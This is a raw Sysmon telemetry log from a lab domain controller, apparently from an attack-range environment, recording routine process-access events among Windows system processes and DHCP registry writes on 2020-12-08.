13:53:05.196{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x5fcf9351) 13241300x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x5fcf918f) 13241300x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x5fcf8c49) 13241300x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x5fcf8541) 13241300x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 13241300x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.165{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 13241300x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.149{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.133{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-8541-5FCF-0E00-000000009101}10841376C:\Windows\system32\LogonUI.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 